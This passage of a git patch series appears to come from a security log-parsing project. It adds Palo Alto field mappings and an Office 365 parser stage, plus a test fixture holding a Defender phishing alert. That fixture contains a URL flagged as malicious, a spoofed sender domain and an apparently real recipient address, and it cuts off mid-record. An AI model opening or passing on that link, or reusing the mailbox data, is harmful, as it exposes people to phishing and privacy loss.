+          paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\\x00', '')}}"
+          paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\\x00', '')}}"
+          paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\\x00', '')}}"
+          paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\\x00', '')}}"
+          paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\\x00', '')}}"
+          paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\\x00', '')}}"
+          paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\\x00', '')}}"
+          paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\\x00', '')}}"
+          paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\\x00', '')}}"
+          paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\\x00', '')}}"
+          paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\\x00', '')}}"
+          paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\\x00', '')}}"
+          paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\\x00', '')}}"
+          paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\\x00', '')}}"
+          paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\\x00', '')}}"
+          paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\\x00', '')}}"
+          paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\\x00', '')}}"
+          paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\\x00', '')}}"
+          paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\\x00', '')}}"
+          paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('\\x00', '')}}"
+          paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('\\x00', '')}}"
+          paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('\\x00', '')}}"
+          paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | replace('\\x00', '')}}"
           paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}"
           paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}"
           paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}"

From fc7a4d495dc46b2bcc174788da81747895dc8649 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 16 Oct 2024 16:56:22 +0200
Subject: [PATCH 157/317] fix(PaloAlto): prune unused fields

---
 .../paloalto-prisma-access/_meta/fields.yml            | 10 ----------
 1 file changed, 10 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
index 7c526334c..6382be28b 100644
--- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml	
@@ -13,11 +13,6 @@ email.to.address:
   name: email.to.address
   type: keyword
 
-paloalto:
-  description: Root of paloalto custom fields
-  name: paloalto
-  type: dict
-
 paloalto.ContentType:
   description: Paloalto content type
   name: paloalto.ContentType
@@ -302,8 +297,3 @@ paloalto.threat.name:
   description: The name of the threat
   name: paloalto.threat.name
   type: keyword
-
-paloalto.threat.type:
-  description: The type of the threat
-  name: paloalto.threat.type
-  type: keyword

From fc3ba061aa5131f8ba5e238d14aceb6f5b63943b Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Wed, 16 Oct 2024 17:42:44 +0200
Subject: [PATCH 158/317] Fix on O365 : Added additional fields to the parser
 and fields.yml

---
 Office 365/o365/_meta/fields.yml              |  5 +++
 Office 365/o365/ingest/parser.yml             | 23 ++++++++++
 ...and_response_with_additional_fields_1.json | 45 +++++++++++++------
 3 files changed, 59 insertions(+), 14 deletions(-)

diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml
index 838ce8899..96bb48e86 100644
--- a/Office 365/o365/_meta/fields.yml	
+++ b/Office 365/o365/_meta/fields.yml	
@@ -373,6 +373,11 @@ office365.investigation.email.urls:
   name: office365.investigation.email.urls
   type: array
 
+office365.investigation.emails:
+  description: Several infos about emails
+  name: office365.investigation.emails
+  type: array
+
 office365.investigation.id:
   description: Investigation id
   name: office365.investigation.id
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 8574ca376..90f07c4ca 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -486,6 +486,29 @@ stages:
       - set:
           event.kind: '{% if parse_data.ParsedData.IsIncident %}{{"alert"}}{% else %}{{"event"}}{% endif %}'
 
+      - set:
+          office365.investigation.emails: >
+            [
+              {%- for action in json_event.message.Actions | map("from_json") -%}
+                {%- for entity in action.Entities -%}
+                {
+                  {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
+                  {%- if entity.NetworkMessageIds != null -%}"message_ids": "{{entity.NetworkMessageIds}}",{%- endif -%}
+                  {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%}
+                  {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%}
+                  {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
+                    "delivery": {
+                      {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%}
+                      {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%}
+                      {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%}
+                    },
+                  {%- endif -%}
+                },
+                {%- endfor -%}
+              {%- endfor -%}
+            ]
+        filter: '{{json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length  !=  json_event.message.Actions | list | length}}'
+
       - set:
           office365.investigation.email.urls: '[{% for Property in parse_data.ParsedData.Entities %}{% for Url in Property.Urls %} "{{Url}}", {% endfor %}{% endfor %}]'
           office365.investigation.email.sender.ip: >
diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json
index 28557157c..d1b102ddf 100644
--- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json	
+++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json	
@@ -1,9 +1,9 @@
 {
   "input": {
-    "message": "{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"275ae857-f201-4a2e-8f43-d48391c56871\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:48971b6852ea31ff93989b88b832bca5\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"<t8x4f5wr3iqw6v62mv5c8gyb9p2v7b91.88246820.v0o2qn@0u8putyigk5lk58rp6upohpkyzd5.namprd3666.prod.outlook.com>\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:780880f2766afe9e0a18e7c6fa676ee2\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"<t8x4f5wr3iqw6v62mv5c8gyb9p2v7b91.88246820.v0o2qn@0u8putyigk5lk58rp6upohpkyzd5.namprd3666.prod.outlook.com>\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"ggravier@ixina.com\\\",\\\"Upn\\\":\\\"ggravier@ixina.com\\\",\\\"AadId\\\":\\\"3339ab32-9c9a-4dab-a67b-d9316a37b2d3\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:9b5a6776b9acaade0704a7a3ed836036\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0436a04039e1a1bd9af706cbef1a6b7a\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (SenderIp:\\\\\\\"40.107.244.101\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;40.107.244.101;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:88f2ce520265ef415e7f63e840feec95\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"wdezd.ersdz.meradebo.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND 